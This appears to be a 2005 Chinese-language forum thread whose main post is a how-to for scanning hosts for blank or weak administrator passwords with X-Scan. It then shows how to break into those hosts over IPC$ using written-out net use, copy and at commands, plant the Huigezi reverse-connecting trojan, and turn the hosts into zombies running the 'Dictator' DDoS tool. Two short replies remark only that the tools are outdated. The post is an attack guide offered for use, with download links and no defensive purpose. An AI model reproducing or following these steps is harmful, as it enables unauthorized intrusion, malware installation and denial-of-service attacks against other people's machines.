设为首页收藏本站
切换到窄版

 找回密码
 注册
搜索
热搜: 超星 读书 找书
网上读书园地»论坛 专业交流与互助 计算机技术[关闭中] 扫描+入侵+攻击
返回列表 发新帖
查看: 550|回复: 2

[【求助】] 扫描+入侵+攻击

[复制链接]
sddz
发表于 2005-8-22 11:23:22 | 显示全部楼层 |阅读模式
扫描+入侵+攻击
  
(以下一些下载的链接可能已经不能使用,希望大家到到别处下载,这里仅仅介绍基本的方法。)

一、扫描
   扫描软件在网络上很多,功能也各一,在这里我推荐大家用x-scan2.0,下载地http://www.ttian.net/download/show.php?id=473
下载解压后,运行x-scan-gui,在“扫描模块”里只选“nt-server弱口令“和“sql-server弱口令”这两项;在“扫描参数”里“基本设置”选项设置你要扫描的ip地址;在“端口相关设置”里“待检测端口”输入你要扫描的端口,在这里可以只扫描1433和3389这两个端口,其它的不变。一切准备好后就开始扫描,要不了多久就会出现结果。
二、入侵
   在这里我们要用到一个木马,我推荐大家用“灰鸽子”,它是一个反弹性木马,具有自动上线连接的功能,当中木马机器的ip地址变了时也会自动上线连接。
   下载地http://www.ttian.net/download/show.php?id=446
   下载解压后有p-client.exe(在自己的机器上运行的客户端程序)和server.exe(在肉鸡上运行的程序)。我们要让对方运行server.exe程序(记住这个程序不要在自己的机器上运行哟)。在让对方运行server.exe程序之前先配置server.exe程序(注意如果不配置这个程序即使对方运行了我们上传上去的server.exe程序,我们也不能和他连接)。具体配置server的方http://www.ttian.net/article/show.php?id=357
   比如我们刚才扫描到一台ip为61.216.216.216的主机,administrator密码为空。我们要利用刚才扫描得到的nt弱口令,再用ipc$管道来连接。具体如下:
   1、先和对方主机建立连接,操作如下:
   net use \\\\61.216.216.216\\ipc$ \"\" /user:\"administrator\"
   2、拷贝木马程序到对方的机器的c盘下,操作如下:
   copy server.exe \\\\61.216.216.216\\c$
   3、查看对方时间,操作如下:
   net time \\\\61.216.216.216
   4、假设对方的时间为下午1:23,让对方机器在13:25运行木马程序,操作如下:
   at \\\\61.216.216.216 13:25 c:\\server.exe(注意对方的时间为12小时制,我们用at命令时要转换为24小时制,让对方运行木马的时间最好比对方机器的当前时间多几分钟)
   5、查看木马程序是否运行,操作如下:
   at \\\\61.216.216.216
   如果清单为空,说明木马已运行了,这时我们可以在自己的机器上运行p-client.exe,刚才中了木马的机器就会自动来连接。
三、攻击
   我写这篇文章的主要目的就是它。我们在这里要用到的一个攻击软件叫“独裁者”,它是一个采用的是分布式拒绝服务攻击的软件,下载下地http://www.leothreads.com/usr/25/25_18196.zip
   “独裁者”的使用教程:
   http://www.s8s8.net/cgi-bin/topi ... ic=17639&show=0
   我们要让肉鸡运行“独裁者”的server.exe程序。
   在木马“灰鸽子”里进入ip为61.216.216.216的主机的c盘,点右键“文件上传自”找到“独裁者”的server.exe点打开既可。当程序上传完后点刷新就可以看到我们刚才上传的server.exe文件了。右键点server.exe选“远程打开”“隐藏运行”,过一会我们就可以在
“独裁者”里加61.216.216.216这个ip了。
   也许有人要问:“就是为什么我们要让对方对行木马,我们不可以直接在dos下上传“独裁者”的server.exe文件并上它运行就行了吗?
在这里我要说的就是“独裁者”没有自动连接的功能,如果肉鸡不是固定的ip,哪肉鸡就只能用一次,因为肉鸡原来哪个ip变了呀!这里的木马就有自动上线连接ip的功能,即使肉鸡的ip变了也能和连接。这样肉鸡就飞不了啦!嘿嘿!
   其实这个的木马还有很多功能,比如可以用来作代理、查看对方屏幕、记录密码等,这就要你自己去慢慢探索吧。
   以上全部在win2000里通过。
回复

使用道具 举报

长歌-废墟
发表于 2005-8-22 22:25:25 | 显示全部楼层
好东西顶上去,好象X—scan已经到3.x了,为什么推荐2.0?
回复

使用道具 举报

birdmanxp
发表于 2005-8-22 23:17:21 | 显示全部楼层
晕死!这么老的转贴中技术已经过时了!
独裁者不过是个DDOS工具而已!灰鸽子也只试用于那些拥有公网IP的人!
X-scan3.2都出来了!
IPC命令都有傻瓜的图形版的了!
哎~搞点新的内容吧!
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|网上读书园地

GMT+8, 2024-11-19 21:34 , Processed in 0.180534 second(s), 18 queries .

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表